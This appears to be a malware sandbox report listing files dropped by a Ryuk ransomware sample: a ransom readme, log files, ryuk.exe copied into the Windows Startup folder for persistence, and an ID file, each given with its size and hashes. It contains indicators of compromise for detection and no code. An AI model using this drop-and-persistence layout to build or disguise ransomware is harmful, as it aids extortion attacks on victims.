bfbac6e6618881f2b8bb119da816441d6540d4137bd4df631d1b3874f301aa1c599d5e488e109adae6e2ee26f15ca67e1d98a8e09bc9fedac77c99477e00e98e

Download Submit
C:\ProgramData\RyukReadMe.txt

Filesize
1KB

MD5
3cfd6ef3b2825aa6ce421e10604ff452

SHA1
7c7c75df4105d3b0d69d1e03220f4d24644a8bde

SHA256
65adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d

SHA512
d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
4b6fbbf03e95f33ba5c363bb67de4b9b

SHA1
e45dbd1ba30ef87d57779dc8ef3f58aba87e5960

SHA256
3f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0

SHA512
bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
4b6fbbf03e95f33ba5c363bb67de4b9b

SHA1
e45dbd1ba30ef87d57779dc8ef3f58aba87e5960

SHA256
3f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0

SHA512
bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
9c66e5c92f7a62d7203428c7d1cda350

SHA1
5b8851a561e6c39000d58f6dcc91b858caa98224

SHA256
2d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe

SHA512
9ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
9c66e5c92f7a62d7203428c7d1cda350

SHA1
5b8851a561e6c39000d58f6dcc91b858caa98224

SHA256
2d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe

SHA512
9ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911

Download Submit
C:\ProgramData\ryuk.exe

Filesize
885KB

MD5
35194c73ff38dd6c3bed7c0efcff6826

SHA1
1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1

SHA256
5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

SHA512
cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID

Filesize
8B

MD5
20bf1c3daf0bf3cfb0db6661538a9afc

SHA1
5db0319ce78dcae075cc393c374b0856cdc2e02a

SHA256
fb3092f5b65b685c2b3550ddbabcc6313a90cced525fe2d3a3e76b692e5f09c6

SHA512
bfbac6e6618881f2b8bb119da816441d6540d4137bd4df631d1b3874f301aa1c599d5e488e109adae6e2ee26f15ca67e1d98a8e09bc9fedac77c99477e00e98e

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1

Filesize
2KB

MD5
4b6fbbf03e95f33ba5c363bb67de4b9b

SHA1
e45dbd1ba30ef87d57779dc8ef3f58aba87e5960

SHA256
3f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0

SHA512
bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2

Filesize
292B

MD5
9c66e5c92f7a62d7203428c7d1cda350

SHA1
5b8851a561e6c39000d58f6dcc91b858caa98224

SHA256
2d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe

SHA512
9ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

Filesize
885KB

MD5
35194c73ff38dd6c3bed7c0efcff6826

SHA1
1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1

SHA256
5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

SHA512
cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

Download Submit

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads